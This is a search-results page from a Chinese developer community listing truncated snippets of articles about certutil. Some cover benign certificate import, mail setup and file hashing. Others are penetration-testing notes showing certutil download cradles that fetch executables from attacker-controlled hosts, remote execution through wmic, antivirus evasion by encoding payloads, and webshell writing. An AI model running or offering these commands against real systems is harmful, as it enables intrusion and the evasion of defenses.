certutil linux - 腾讯云开发者社区

文章/答案/技术大牛

发布

certutil 导入 CA 证书

在linux下使用GoAgent客户端的时候，需要导入CA.cer证书。...安装证书管理工具 apt-get install libnss3-tools 导入证书 $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n...GoAgent -i ~/programs/goagent/local/CA.crt 如果输出： certutil: function failed: security library: bad...$ mv ~/.pki/nssdb ~/.pki/nssdb.corrupted $ mkdir ~/.pki/nssdb $ chmod 700 ~/.pki/nssdb $ certutil -d.../goagent/local/CA.crt tips：本文由wp2Blog导入，原文链接：http://devonios.com/certutil-%e5%af%bc%e5%85%a5-ca-%e8%

1.9K4 0

certutil 导入 CA 证书

在linux下使用GoAgent客户端的时候，需要导入CA.cer证书。...安装证书管理工具 apt-get install libnss3-tools 导入证书 $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent...-i ~/programs/goagent/local/CA.crt 如果输出： certutil: function failed: security library: bad database....$ mv ~/.pki/nssdb ~/.pki/nssdb.corrupted $ mkdir ~/.pki/nssdb $ chmod 700 ~/.pki/nssdb $ certutil -d...sql:$HOME/.pki/nssdb -N 导入证书： $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent -i ~/programs

3.5K2 0

您找到你想要的搜索结果了吗？

是的

没有找到

certutil工具使用和bypass学习

使用介绍 certutil -?...参考至：https://xz.aliyun.com/t/9737 使用certutil下载文件会产生缓存，用如下命令查看： certutil -urlcache * 使用命令将当前的缓存删除： certutil...://192.168.22.104/crow.txt delete 2.2 hash验证在linux下可以使用md5、md5sum等校验hash值在Windows上就可以使用certutil来计算...： certutil -hashfile crow.txt MD5 //检验MD5 certutil -hashfile crow.txt SHA1 //检验SHA1 certutil -hashfile...certutil文件拷贝到当前目录，然后执行命令： where certutil copy C:\Windows\System32\certutil.exe crow.exe 再来执行命令试试： crow

4.1K2 0

certutil 命令配合PS反弹后门

Certutil.exe是一个命令行程序，作为证书服务的一部分安装。...C:\> certutil.exe -urlcache -split -f http://lyshark.com/lyshark.log C:\> certutil.exe -urlcache -split...编码后生成目标文件lyshark.bat C:\> certutil -encode lyshark.log lyshark.bat 输入长度 = 12 输出长度 = 74 CertUtil: -encode...C:\> certutil -decode lyshark.bat lyshark.log 输入长度 = 74 输出长度 = 12 CertUtil: -decode 命令成功完成。...Certutil.exe + -ping Argument Invoke-CradleCrafter\Memory> CERTUTIL [*] Name :

1.2K3 0

【免杀】certutil工具bypass杀软

了解过certutil工具的师傅建议直接到0x02 0x01 关于certutil工具的介绍以及一些基础的用法 Certutil.exe是作为证书服务的一部分安装的命令行程序。...以上呢是微软官方对于Certutil.exe工具的使用介绍，不过现在Certutil.exe已经被黑客广泛利用于下载，编码解码等用途。所以现在他被杀的蛮死的。...-- 显示该用法消息 CertUtil -? -- 显示动词列表(命名列表) CertUtil -dump -?...Certutil.exe -urlcache * 如果不想生成缓存的话可以用 certutil & certutil -urlcache -split -f http://ip/xx.exe delete...如果用的是linux的话可以用下面这个命令将文本分割成想要的大小 split -b 1M xxx.txt output 这里我用python切割一下。

1.1K1 0

干货 | Certutil在渗透中的利用和详解

何为certutil certutil.exe 是一个合法Windows文件，用于管理Windows证书的程序。...这里我首先在命令行用certutil -?查看一下certutil所有的参数，这里只截图了一部分，接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。 ?...certutil下载文件一般我最常使用的certutil的功能就是在cmd环境下下载文件，因为certutil是windows自带的exe，所以在使用的时候会比其他exe或者vbs更加方便。...另外一种方法就是使用windows自带的分隔符&和|，本质上跟第一种方法一样，相当于执行了两次certutil certutil & certutil -urlcache -split -f http:...使用certutil下载文件有个弊端就是会产生缓存文件，用如下命令查看： certutil -urlcache * ? 执行删除缓存 certutil -urlcache * delete ?

7K6 1

干货 | Certutil在渗透中的利用和详解

何为certutil certutil.exe 是一个合法Windows文件，用于管理Windows证书的程序。...这里我首先在命令行用certutil -?查看一下certutil所有的参数，这里只截图了一部分，接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。...certutil下载文件一般我最常使用的certutil的功能就是在cmd环境下下载文件，因为certutil是windows自带的exe，所以在使用的时候会比其他exe或者vbs更加方便。...hash进行比对，使用certutil也能够获取hash值 certutil -hashfile mimikatz.exe MD5 //检验MD5certutil -hashfile mimikatz.exe...:: powershell.exe spawns certutil.exe certutil.exe [*] Artifacts :: C:\Windows\Prefetch\CERTUTIL.EXE

2.7K2 1

详细分析使用Certutil解码的Office恶意软件

最近发现使用certutil进行解码的office恶意软件，这种恶意软件通过OLE机制落地通过BASE64编码的恶意软件，然后通过调用certutil来进行解码恶意软件，并通过宏来启动恶意软件，这样做主要是为了绕过杀软的检测点...在拼接出以后开始调用 certutil.exe 进行对WORD,VRE进行解码。 ? 下图为WORD.VRE被编码的格式。 ?...certutil.exe 是微软自带的软件，阅读原文查看官方的介绍其中的decode和encode可以实现对一个文件进行Base64的编码和解码。 ?

1.1K4 0

md5值是不是哈希值_2000哈希

Linux (Linux) Linux distributions like Ubuntu, Debian, Mint, Kali, Fedora, CentOS, RedHat provides following...WinMD5 Free WinMD5免费 CertUtil 证书实用程序 … … 计算并验证MD5 (Calculate and Verify MD5) In this part, we will...Linux (Linux) For Linux distributions, we will use md5 command....tool named certutil ....在Windows中，我们将使用名为certutil命令行工具。在这种情况下，我们将提供名为MD5的文件和哈希类型。 PS> certutil.exe -hashfile .

1.4K2 0

【内网安全】横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/bindtcp-2222.exe...@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444...print(wmi_exec) os.system(wmi_exec) if __name__ == '__main__': down() zx() 2、Linux...Linux Proxychains使用安装使用：https://blog.csdn.net/qq_53086690/article/details/121779832 代理配置：Proxychains.conf...@#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/webserver4444.exe &

5651 0

怎么让Linux发邮件？ Linux怎么发email

相比大家也想让自己的Linux备份啊什么的存储起来放到哪里最安全呢相比来说放到自己QQ邮箱比放到自己电脑更安全一些我们今天就来做一个实验让你的Linux发邮件到你的mail中我们今天需要一个软件...s_client -connect smtp.qq.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/.certs/qq.crt certutil...-A -n "GeoTrust SSL CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -A -n "GeoTrust Global CA"...-t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -L -d /root/.certs cd /root/.certs/ certutil -A -n "...验证成功以后就会给你一个授权码其实我们要的是授权码然后我们进Linux 打开刚才mail的配置文件加入规则： vi /etc/mail.rc 进入以后我们加入规则 set smtp-use-starttls

8.7K2 0

CentOS下利用mailx发送邮件

Linux服务器运维过程中需要监控系统状况并自动报警，有时有邮件报警的需要，一般Linux发送报警邮件可以通过本地邮箱或外部邮箱服务器，这里用最简单的方法：利用mailx一个小型的邮件发送程序使用外部邮箱即可实现发送邮件功能...sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/.certs/qq.crt # 添加证书到数据库 [root@localhost ~]# certutil...-A -n "GeoTrust SSL CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt [root@localhost ~]# certutil -A -n "...GeoTrust Global CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt # 列出指定目录下的证书 [root@localhost ~]# certutil...Peer's certificate issuer is not recognized.”这样的证书没有获得认可的警告提示，需要执行下面指明受信任证书、防报错的命令 [root@localhost ~]# certutil

1.4K2 0

Linux发邮件shell脚本与群发邮件shell脚本

Linux发邮件shell脚本与群发邮件shell脚本说明：因为明天统计疫情健康打卡，需要通知同学完成打卡，最开始是一个人一个人的进行QQ通知，为了方便通知，我利用Linux写了一个shell定时群发邮件提醒脚本...，如果大家有需要的可以参考我的方式方法下面我将我进行配置的方法分享给大家 1.Linux安装邮件服务因为Linux默认没有安装mail邮件服务，我们将进行安装，输入安装命令等待几秒即可安装成功...-connect smtp.qq.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/.certs/qq.crt certutil...-A -n "GeoTrust SSL CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -A -n "GeoTrust Global CA"...-t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -L -d /root/.certs 注意：生成完成之后，修改 mail.rc 邮件配置，修改 nss-config-dir

3.9K2 0

正版哈希值校验工具_哈希校验

windows, macos 和 linux 平台的哈希校验方法汇总简介语法 windows 平台 macos 平台 linux 平台测试以字符串hello为例将hello字符串保存在文件中...语法常用的算法有 md5， sha-1 ，sha256. windows 平台 certutil -hashfile filename md5 certutil -hashfile filename...sha1 certutil -hashfile filename sha256 macos 平台 md5 filename shasum -a 1 filename shasum -a 256...echo 会直接在输出的字符串后面添加 '\n' echo -n "hello" | shasum -a 256 # 计算的为 "hello" 的哈希，-n 会阻止 echo 为字符串添加 '\n' linux...而linux系行尾用的只有换行符，即’\n’,也就是LF。因此，windows平台要想得到和linux平台一致的结果，首先要调整文件格式到unix格式。

1.9K2 0

免杀学习-从指令绕过开始-1

免杀新伙伴-daybreak，这个工具是类似CS的工具下面的图片是它的控制界面，利用了Web界面更加简介美观且自带中文分析一下它自带的上线语句支持多种操作系统的上线，相比CS需要按照插件才能上线linux...更加集成支持利用powershell和certutil指令进行上线操作 powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden...自带的加解密功能进行木马的免杀加密代码 Certutil -encode C+Powershell.exe out.txt C语言源码 #include #include <stdlib.h...+n.txt out.txt 最后利用 certutil -decode out.txt C2可执行文件名.exe 我们通过以下命令进行加密，产生txt文件 Certutil -encode C+...Powershell.exe out.txt 利用文本切割器，按照每500行一份进行切割文本切割器网站 https://uutool.cn/txt-incise/ 我们将文本缝合后利用certutil

4792 0

录音笔传输文件自动校验

3、linux环境校验文件完整性 Linux下可以直接使用md5sum/sha1sum/sha256sum命令直接计算文件的对应校验值。...Hello.mp3 sha1sum/works/Hello.mp3 sha256sum/works/Hello.mp3 4、Windows环境校验文件完整性 Windows下可以使用Windows自带的certutil...certutil支持的算法有：MD2 MD4 MD5 SHA1SHA256 SHA384 SHA512。...certutil的使用方法：执行“certutil-hashfile 文件名校验值类型”，即可计算出对应文件的校验值。...例如：certutil -hashfile C:\Hello.mp3MD5 ?

2.7K2 0

WindowsLinux文件下载方式汇总

文章前言在渗透过程中，通常会需要向目标主机传送一些文件，来达到权限提升、权限维持等目的，本篇文章主要介绍一些windows和Linux下常用的文件下载方式。...certutil.exe是一个命令行程序，作为证书服务的一部分安装，你可以使用Certutil.exe转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原CA组件，以及验证证书，密钥对和证书链...我们可以在cmd中输入以下命令来查看certutil的具体使用方法： certutil -? ?...在渗透测试过程中，我们可以借助certutil来实现远程下载文件到本地： certutil -urlcache -split -f http://192.168.174.1:1234/evil.txt...之后运行该hta文件即可(在实战中可以由CS来生成hta攻击文件，之后进行攻击反弹shell回来进行后渗透测试)~ Linux 编程语言 Perl Perl是目前很受欢迎的主流脚本语言，linux主机一般都自带

2.5K5 0

Centos 7 使用mailx发送邮件

由于后面要写有关shell，所以先学习怎么发邮件 1.mailx mailx是Linux系统上用来处理邮件的工具,使用它可以发送,读取邮件使用以下命令安装（发现好像系统自带了） yum -y...smtp.139.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/pki/nssdb/139.crt $ certutil...-A -n "GeoTrust SSL CA" -t "C,," -d /etc/pki/nssdb/ -i /etc/pki/nssdb/139.crt $ certutil -A -n "GeoTrust...Global CA" -t "C,," -d /etc/pki/nssdb/ -i /etc/pki/nssdb/139.crt $ certutil -L -d /etc/pki/nssdb/ 进入

1.7K1 0

mailx结合QQ邮箱在Linux下利用发送系统邮件提醒等

安装和配置系统的mailx：　　这里以服务器首选的Linux发行版CentOS为例（好像默认都已经集成了mailx的，至于说sendmail，笔者感觉效能差，就不做参考了）。　　...s_client -connect smtp.qq.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/.certs/qq.crt certutil...-A -n "GeoTrust SSL CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -A -n "GeoTrust Global CA"...-t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -L -d /root/.certs 　　为了防止出现前文所说的发送邮件警告提示，还需要进入邮箱SSL证书存放目录.../root/.certs里执行如下命令： certutil -A -n "GeoTrust SSL CA - G3" -t "Pu,Pu,Pu" -d ./ -i qq.crt 　　返回如下提示即可：

2.6K0 0

命令执行之文件落地利用总结

这里我们根据可能会遇到的多个场景进行了一些测试，如：Linux/Windows，出/不出网、有/无回显。...注：我们可以通过在网站前/后台的上传功能随便传一个文件，然后再利用Windows的for或Linux的while等命令来查找刚上传的文件，或网站下已存在的文件得到绝对路径，最后再写入文件即可，继续往下看.../shell.txt & certutil -decode %i/../shell.txt %i/...../shell.txt & certutil -decodehex %i/../shell.txt %i/.....Linux、Windows利用方式都一样，只是命令不一样，都是根据文件名、文件内容找绝对路径，常见文件写入、下载方式进行Getshell。

1.4K2 0

点击加载更多

certutil 导入 CA 证书

certutil 导入 CA 证书

certutil工具使用和bypass学习

certutil 命令配合PS反弹后门

【免杀】certutil工具bypass杀软

干货 | Certutil在渗透中的利用和详解

干货 | Certutil在渗透中的利用和详解

详细分析使用Certutil解码的Office恶意软件

md5值是不是哈希值_2000哈希

【内网安全】横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

怎么让Linux发邮件？ Linux怎么发email

CentOS下利用mailx发送邮件

Linux发邮件shell脚本与群发邮件shell脚本

正版哈希值校验工具_哈希校验

免杀学习-从指令绕过开始-1

录音笔传输文件自动校验

WindowsLinux文件下载方式汇总

Centos 7 使用mailx发送邮件

mailx结合QQ邮箱在Linux下利用发送系统邮件提醒等

命令执行之文件落地利用总结

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐